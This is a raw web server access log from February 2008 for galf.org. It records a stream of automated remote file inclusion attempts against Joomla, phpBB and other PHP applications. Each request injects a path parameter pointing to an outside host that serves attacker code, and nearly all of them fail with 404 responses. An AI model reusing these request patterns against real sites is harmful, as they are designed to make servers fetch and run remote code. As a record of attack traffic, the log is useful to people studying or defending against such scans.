82.134.6.30 - - [17/Feb/2008:20:00:57 -0800] "GET /logs/access_070917.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:00:57 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:00:57 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:01:09 -0800] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.15.190.12 - - [17/Feb/2008:20:01:09 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.15.190.12 - - [17/Feb/2008:20:01:10 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.72.144.18 - - [17/Feb/2008:20:01:59 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:02:00 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:02:00 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:02:00 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:02:00 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:20:02:00 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:02:19 -0800] "GET /logs/access_070917.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:02:20 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:02:21 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.236.106 - - [17/Feb/2008:20:03:07 -0800] "GET /logs/access_080114.log//newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.236.106 - - [17/Feb/2008:20:03:08 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.236.106 - - [17/Feb/2008:20:03:08 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.233.7.68 - - [17/Feb/2008:20:03:21 -0800] "GET /logs/index.php?page=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:20:03:37 -0800] "GET /logs/access_080114.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:20:03:38 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:20:03:38 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:20:03:39 -0800] "GET /logs/access_080114.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:20:03:39 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:20:03:40 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:20:04:37 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:20:04:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:20:04:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:20:04:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:05:52 -0800] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
82.134.6.30 - - [17/Feb/2008:20:05:52 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
82.134.6.30 - - [17/Feb/2008:20:05:53 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
200.105.239.8 - - [17/Feb/2008:20:06:44 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.105.239.8 - - [17/Feb/2008:20:06:44 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.100.220.42 - - [17/Feb/2008:20:07:21 -0800] "GET /display.php?table=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:20:10:12 -0800] "GET /logs/access_070917.log/view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:20:10:12 -0800] "GET /logs/view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [17/Feb/2008:20:10:30 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
61.63.3.45 - - [17/Feb/2008:20:10:30 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
87.25.213.172 - - [17/Feb/2008:20:13:35 -0800] "GET /logs/access_070917.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.25.213.172 - - [17/Feb/2008:20:13:35 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:14:06 -0800] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
83.16.96.219 - - [17/Feb/2008:20:14:07 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
83.16.96.219 - - [17/Feb/2008:20:14:08 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
67.15.190.12 - - [17/Feb/2008:20:14:12 -0800] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:14:12 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:14:12 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:14:27 -0800] "GET /logs/access_080114.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:14:27 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:14:27 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:20:16:33 -0800] "GET /logs/access_080114.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.96.122.251 - - [17/Feb/2008:20:17:37 -0800] "GET /logs/access_070917.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://209.40.202.204/~irvian/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.96.122.251 - - [17/Feb/2008:20:17:37 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://209.40.202.204/~irvian/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.96.122.251 - - [17/Feb/2008:20:17:38 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://209.40.202.204/~irvian/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.235 - - [17/Feb/2008:20:18:00 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.150.32.194 - - [17/Feb/2008:20:18:59 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
202.150.32.194 - - [17/Feb/2008:20:18:59 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
61.63.3.45 - - [17/Feb/2008:20:19:06 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
61.63.3.45 - - [17/Feb/2008:20:19:06 -0800] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:19:48 -0800] "GET /logs/access_080114.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:19:48 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:19:49 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:20:20:32 -0800] "GET /logs/access_070917.log/view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:20:20:32 -0800] "GET /logs/access_070917.log/view.php?table=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:20:20:32 -0800] "GET /logs/view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:20:20:33 -0800] "GET /logs/view.php?table=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.67.223.188 - - [17/Feb/2008:20:22:04 -0800] "GET /logs/access_080114.log//errors.php?error=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.67.223.188 - - [17/Feb/2008:20:22:04 -0800] "GET //errors.php?error=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.67.223.188 - - [17/Feb/2008:20:22:04 -0800] "GET /logs//errors.php?error=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:23:30 -0800] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:23:30 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:23:30 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.67.223.188 - - [17/Feb/2008:20:24:19 -0800] "GET /logs/access_080114.log//errors.php?error=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.67.223.188 - - [17/Feb/2008:20:24:19 -0800] "GET //errors.php?error=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.67.223.188 - - [17/Feb/2008:20:24:19 -0800] "GET /logs//errors.php?error=http://www.iseeproject.org/cms/administrator/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.25.213.172 - - [17/Feb/2008:20:29:33 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:20:31:20 -0800] "GET /logs/access_080114.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.5 - - [17/Feb/2008:20:31:38 -0800] "GET /logs/access_070917.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.5 - - [17/Feb/2008:20:31:38 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.5 - - [17/Feb/2008:20:31:39 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.63.3.45 - - [17/Feb/2008:20:31:59 -0800] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
61.63.3.45 - - [17/Feb/2008:20:31:59 -0800] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:32:03 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:32:03 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:32:03 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:20:32:03 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
72.30.214.237 - - [17/Feb/2008:20:38:27 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:38:58 -0800] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:38:59 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:39:00 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:39:22 -0800] "GET /logs/access_080114.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:39:23 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:39:24 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.237.64.193 - - [17/Feb/2008:20:41:03 -0800] "GET /logs/access_080114.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://barnwellweb.com/modules/MDForum/includes/us/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
218.237.64.193 - - [17/Feb/2008:20:41:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://barnwellweb.com/modules/MDForum/includes/us/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
218.237.64.193 - - [17/Feb/2008:20:41:04 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://barnwellweb.com/modules/MDForum/includes/us/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
86.109.165.53 - - [17/Feb/2008:20:45:03 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
86.109.165.53 - - [17/Feb/2008:20:45:04 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
209.172.48.89 - - [17/Feb/2008:20:45:54 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://hd-t128cl.privatedns.com/~expobell/joomla/images/banners/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.65.116.80 - - [17/Feb/2008:20:46:06 -0800] "GET /index.php?x=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
216.65.116.80 - - [17/Feb/2008:20:46:06 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
216.65.116.80 - - [17/Feb/2008:20:46:06 -0800] "GET /logs/index.php?x=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
216.65.116.80 - - [17/Feb/2008:20:46:06 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
217.22.60.11 - - [17/Feb/2008:20:49:42 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.10.124.100 - - [17/Feb/2008:20:50:43 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
204.10.124.100 - - [17/Feb/2008:20:50:43 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:20:51:03 -0800] "GET /logs/access_080114.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.10.124.100 - - [17/Feb/2008:20:51:20 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "galf.org"
204.10.124.100 - - [17/Feb/2008:20:51:20 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "galf.org"
